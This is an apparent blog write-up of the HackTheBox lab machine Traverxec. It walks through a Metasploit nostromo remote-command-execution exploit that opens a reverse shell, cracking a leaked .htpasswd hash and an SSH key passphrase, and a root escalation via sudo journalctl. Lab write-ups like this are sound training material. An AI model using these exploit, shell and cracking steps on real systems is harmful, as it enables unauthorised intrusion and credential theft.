Hackthebox – Traverxec

Traverxec is an easy machine which should not be too dificult. However, after Hackthebox – Forest, I learned not to underestimate anything labelled as easy. Let’s start with a portscan

root@kalivm:~/Traverxec# nmap -A -oN fullscan-A 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 08:10 CET
Nmap scan report for 10.10.10.165 (10.10.10.165)
Host is up (0.016s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   16.69 ms 10.10.14.1 (10.10.14.1)
2   16.64 ms 10.10.10.165 (10.10.10.165)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done 1 IP address (1 host up) scanned in 18.59 seconds

So all that is open, is the SSH server and a web server. Nothing of too much interest and after some poking around, I found that most gobuster actions result in disconnects so the web pages themselves are probably for now not the way to go.
After some research on the nostromo webserver, I found this MSF exploit and was too lazy to convert it to some python based thing even though I learned that through OSCP. I decided to save the .rb file in the /usr/share/metasploit-framework/modules/exploits/linux/http directory and start MSF.

root@kalivm:~/Traverxec# msfconsole 
msf5 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/linux/http/nostromo_traverxec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution
msf5 > use 0
msf5 exploit(linux/http/nostromo_traverxec) > set RHOSTS 10.10.10.165
RHOSTS => 10.10.10.165
msf5 exploit(linux/http/nostromo_traverxec) > set LHOST tun0
LHOST => 10.10.15.48
msf5 exploit(linux/http/nostromo_traverxec) > exploit

[*] Started reverse TCP handler on 10.10.15.48:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.48:4444 -> 10.10.10.165:39646) at 2019-11-21 09:14:54 +0100

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$ 

So now i’ve got a working Shell, next up finding out how to become the user David, and access the user.txt. After some browsing around doing the usual privilege escalation stuff, I had not yet found much of interest. but then I started taking a look at the configuration files of the Nostromo web server.

www-data@traverxec:/var/nostromo$ cat conf/nhttpd.conf
cat conf/nhttpd.conf
# MAIN [MANDATORY]

servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html

# LOGS [OPTIONAL]

logpid			logs/nhttpd.pid

# SETUID [RECOMMENDED]

user			www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons			/var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www

Now there are several interesting things in this configuration file. First, the admin name is, as expected, David. Not much of a surprise as I had also seen this on the frontpage, and in the /etc/passwd file. There is however, a location provided where .htaccess and .htpasswd files are located, these may contain credentials. Another interesting part, is the fact that apparently, public_www directories in home directories are also published by nostromo! If this directory exists in David’s home directory, it should be readable by my current www-data user in order to publish it online.

www-data@traverxec:/var/nostromo$ ls /home/david/public_www
index.html  protected-file-area
www-data@traverxec:/var/nostromo$ ls /home/david/public_www/protected-file-area
ls /home/david/public_www/protected-file-area
backup-ssh-identity-files.tgz

After a quick check, the directory exists, contains a subdirectory, and even more interesting, seems to contain a backup file with ssh-identity files. This may be my way to user!

www-data@traverxec:/var/nostromo$ cat conf/.htpasswd
cat conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

This looks like a regular MD5 hash which should not be too hard to crack.

$ hashcat -m 500 -w 3 -a 0 traverxec.hash ./rockyou.txt --username
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 6GB, 1518/6075 MB allocatable, 10MCU
---snip---
* Filename..: ./rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me    
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Time.Started.....: Thu Nov 21 08:52:01 2019 (9 secs)
Time.Estimated...: Thu Nov 21 08:52:10 2019 (0 secs)
Guess.Base.......: File (./rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1271.4 kH/s (105.97ms) @ Accel:1024 Loops:500 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10813440/14344385 (75.38%)
Rejected.........: 0/10813440 (0.00%)
Restore.Point....: 10485760/14344385 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:500-1000
Candidates.#1....: XiaoNianNian -> Ms.KEL
Hardware.Mon.#1..: Temp: 45c Fan: 24% Util:100% Core:1898MHz Mem:3802MHz Bus:16

Started: Thu Nov 21 08:51:59 2019
Stopped: Thu Nov 21 08:52:11 2019

My expectations were right, in just under 10 seconds the password was cracked to be Nowonly4me. However, I do not yet have the tgz file I saw, so lets take a look at that file in a browser.

As expected, I get a login screen with HTTP Basic authentication, time to try the username and password as I cracked them

Bingo, I now got access to the zipfile, so I download it, unzip it and try the id_rsa file I found.

root@kalivm:~/Traverxec# ssh -i home/david/.ssh/id_rsa david@10.10.10.165
Enter passphrase for key 'home/david/.ssh/id_rsa': 

So there’s a password on the keyfile. I’ve seen this before in Hackthebox – Ghoul and several other boxes so this should be a piece of cake.

root@kalivm:~/Traverxec# python /usr/share/john/ssh2john.py home/david/.ssh/id_rsa > david.hash
root@kalivm:~/Traverxec# john david.hash --format=SSH
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
hunter           (home/david/.ssh/id_rsa)
Proceeding with incremental:ASCII
1g 0:00:00:03  3/3 0.2673g/s 922742p/s 922742c/s 922742C/s staricho..starisse
Session completed

Done, the password is hunter.

root@kalivm:~/Traverxec# ssh -i home/david/.ssh/id_rsa david@10.10.10.165
Enter passphrase for key 'home/david/.ssh/id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Thu Nov 21 02:58:35 2019 from 10.10.15.18
david@traverxec:~$ cat user.txt
7db0b484<NOFLAG>cec20750d9782f3d

After I try to login as used david, with the ssh-key passphrase hunter, I can access the user.txt flag.

Privilege escalation

After the next step of privilege escalation recon, I find a file in david’s home directory called server-stats.sh

david@traverxec:~$ cat bin/server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

I take a look at this file and see that journalctl is called with sudo (root) privileges. This is interesting as journalctl is a known GTFObins privilege escalation path. so I decide to try it

david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Thu 2019-11-21 02:10:13 EST, end at Thu 2019-11-21 03:00:33 EST. --
Nov 21 02:58:41 traverxec sudo[4155]: www-data : user NOT in sudoers ; TTY=pts/3 ; PWD=/var/nostromo/conf ; USER=root ; COMMAND=dav
Nov 21 03:00:04 traverxec su[4339]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/3 ruser=www-data rhos
Nov 21 03:00:06 traverxec su[4339]: FAILED SU (to david) www-data on pts/3
Nov 21 03:00:21 traverxec su[4373]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/3 ruser=www-data rhos
Nov 21 03:00:23 traverxec su[4373]: FAILED SU (to root) www-data on pts/3
!/bin/sh
# cat /root/root.txt
9aa36a6d<NOFLAG>d320a478f6e0d906

And there we have the root flag!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.